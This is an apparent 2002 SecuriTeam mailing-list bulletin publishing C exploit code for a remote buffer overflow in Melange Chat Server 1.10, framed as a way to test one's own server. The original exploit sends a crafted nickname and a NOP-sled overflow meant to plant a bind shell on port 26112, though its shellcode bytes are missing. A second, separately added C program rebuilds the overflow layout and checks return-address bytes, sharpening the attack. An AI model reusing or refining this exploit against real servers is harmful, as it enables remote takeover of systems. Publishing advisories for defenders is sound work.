[EXPL] Melange Chat System Remote Exploit Code Released

From: support@securiteam.com
To: list@securiteam.com
Date: 25 Dec 2002 10:51:50 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Melange Chat System Remote Exploit Code Released


    Christian Walter's Melange Chat System (http://melange.terminal.at/) is a
    chat client/server that provides an easy way to set up your own powerful
    chat. A remotely exploitable buffer overflow in the product allows a
    remote attacker to completely compromise the server. The following
    exploit code can be used to test your own system for the mentioned
    vulnerability:


    /*
       Proof of Concept for Melange Chat Server 1.10
       a lame remote bof exploit by innerphobia <up2u_@hotmail.com> 12/24/02

       Credits go to:
       - iDefense Labs for the advisory
       - blink for discovering the bug
       - Irian for the shellcode

       With careful calculation it is *possible* to control even the EIP,
       not just one byte of EIP.
       There are a few things that will happen if we use a wrong ret:
       1. Seg fault / shut down.
       2. Keep on going < nothing happens >.

       Code tested on Suse 8.0 and RH 7.3
       Merry Xmas :)
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>

    // magic numbers begin here
    #define ADDR 0xbfffd490     // default return address, overridable on the command line
    #define NICKLEN 49          // "/NICK " plus 43 filler bytes
    #define BUFFLEN 463         // length of the overflow string
    // magic numbers end

    // brutally copied from Irian's cy.c
    // (the shellcode bytes are missing from this posting; the shellcode is
    // expected to bind a shell on port 26112, see the final printf below)
    char evil[]="";

    int main(int argc,char **argv){
        int i,j=0,sock,port = 6666;
        char *host;
        char nick[NICKLEN],buff[BUFFLEN];
        struct hostent *htent;
        struct sockaddr_in serv_addr;
        long jump = ADDR;

        if(argc<2){
            printf("Usage : %s [hostname] [ret address in hex (0x41414141)] [port]\n",argv[0]);
            exit(1);
        }

        host=argv[1];
        if(argc>2) sscanf(argv[2],"0x%lx",&jump);
        if(argc>3) port=atoi(argv[3]);

        if((htent = gethostbyname(host)) != NULL && (sock =
    socket(AF_INET,SOCK_STREAM,0)) != -1){

            memset(&serv_addr,0,sizeof(serv_addr));
            serv_addr.sin_family = AF_INET;
            serv_addr.sin_port = htons(port);
            memcpy(&serv_addr.sin_addr,htent->h_addr,htent->h_length);

            if(!connect(sock,(struct sockaddr *)&serv_addr,sizeof(serv_addr))){

                printf("Connected to %s at %d [0x%lx]\nTrying to send %d chars as nickname\n",
                       host,port,jump,(int)sizeof(nick));

                // first message: "/NICK " followed by 43 'A's, no terminator
                memset(nick,'A',sizeof(nick)),memcpy(nick,"/NICK ",6);

                if(send(sock,nick,sizeof(nick),0) == -1)
                    perror("Sending nickname failed\n"),exit(1);

                // second message: fill the whole buffer with the return address
                // (little-endian, 4-byte aligned to the start of the buffer), ...
                for(i=0;i<sizeof(buff);i++) buff[i]=((char *)&jump)[i%4];
                // ... then overwrite the first BUFFLEN-200-strlen(evil) bytes with a
                // NOP sled and the shellcode, leaving 200 bytes of return address
                for(i=0;i<sizeof(buff)-200-strlen(evil);i++) buff[i]=0x90;
                for(j=0;j<strlen(evil);j++) buff[i++]=evil[j];

                printf("Trying to send overflow string\n");

                if(send(sock,buff,sizeof(buff),0) == -1)
                    perror("Sending overflow failed :(\n"),exit(1);

                printf("Now try to connect to host : %s port : 26112\n",host);
                close(sock);
            }
            else printf("Can't connect to %s at %d\n",host,port),exit(1);
        }
        else printf("Can't resolve %s or create a socket\n",host),exit(1);

        return 0;
    }

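    The exploit above depends on three tuned values (the 49-byte nickname, the
    463-byte overflow string and the return address that fills its tail), and
    the header comment warns that a wrong return address either crashes the
    server or does nothing. The helper below is added here as an illustration;
    it is not innerphobia's code and not part of the Melange project. It builds
    the same layout (return address repeated, NOP sled, shellcode, 200 trailing
    bytes of return address) and adds the two checks a practitioner wants before
    firing it: that the address contains none of the bytes a line-oriented chat
    protocol is assumed to cut a command at (NUL, CR, LF; an assumption about
    the server, not something this page documents), and how many 4-byte-aligned
    copies of the address survive in the buffer, each of which is a candidate to
    land on the saved return address. The four 0xcc bytes in main are a
    constructed stand-in for the real shellcode.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Bytes a line-oriented chat protocol is assumed to treat specially (an
 * assumption about the server, not documented on this page): NUL ends a C
 * string and CR/LF end a command line, so a return address containing any of
 * them would be cut short before it reaches the stack. */
static int has_bad_byte(uint32_t ret)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((ret >> (8 * i)) & 0xff);
        if (b == 0x00 || b == 0x0a || b == 0x0d)
            return 1;
    }
    return 0;
}

/* Build out[0..outlen) the way the exploit above does: every byte first gets
 * the little-endian return address repeated (4-byte aligned to the start of
 * the buffer), then the leading outlen-tail-sclen bytes are overwritten with
 * a NOP sled followed by the shellcode, leaving `tail` bytes of return
 * address at the end. Returns the sled length, or (size_t)-1 when the layout
 * does not fit or the address contains a bad byte. */
static size_t build_overflow(unsigned char *out, size_t outlen, uint32_t ret,
                             const unsigned char *sc, size_t sclen, size_t tail)
{
    if (has_bad_byte(ret) || sclen + tail > outlen)
        return (size_t)-1;
    for (size_t i = 0; i < outlen; i++)
        out[i] = (unsigned char)((ret >> (8 * (i % 4))) & 0xff);
    size_t sled = outlen - tail - sclen;
    memset(out, 0x90, sled);
    memcpy(out + sled, sc, sclen);
    return sled;
}

/* Count the 4-byte-aligned positions in buf that hold a complete copy of ret.
 * When the overflowed frame is itself 4-byte aligned only these copies can
 * overwrite the saved return address cleanly; the others shift the address by
 * one to three bytes, which is the "one byte of EIP" case the header comment
 * mentions. */
static size_t aligned_ret_copies(const unsigned char *buf, size_t len, uint32_t ret)
{
    size_t n = 0;
    for (size_t i = 0; i + 4 <= len; i += 4) {
        uint32_t v = (uint32_t)buf[i] | ((uint32_t)buf[i + 1] << 8) |
                     ((uint32_t)buf[i + 2] << 16) | ((uint32_t)buf[i + 3] << 24);
        if (v == ret)
            n++;
    }
    return n;
}

int main(void)
{
    /* Values from the exploit above; the shellcode is a constructed 4-byte
     * stand-in (int3 instructions), not Irian's real shellcode. */
    static const unsigned char fake_sc[4] = { 0xcc, 0xcc, 0xcc, 0xcc };
    unsigned char buf[463];
    uint32_t ret = 0xbfffd490u;

    size_t sled = build_overflow(buf, sizeof buf, ret, fake_sc, sizeof fake_sc, 200);
    if (sled == (size_t)-1) {
        printf("layout rejected\n");
        return 1;
    }
    printf("sled %zu bytes, shellcode at offset %zu, %zu aligned copies of 0x%08x\n",
           sled, sled, aligned_ret_copies(buf, sizeof buf, ret), ret);
    printf("0xbfff0a00 usable as ret: %s\n", has_bad_byte(0xbfff0a00u) ? "no" : "yes");
    return 0;
}
```

    Build it with `cc -o layout layout.c` and run it without arguments: for the
    page's values it reports a 259-byte sled, the stand-in shellcode at offset
    259 and 49 aligned copies of 0xbfffd490, and it rejects an address such as
    0xbfff0a00 that a line-based server would truncate in transit.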

    The information has been provided by innerphobia <up2u_@hotmail.com>.


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.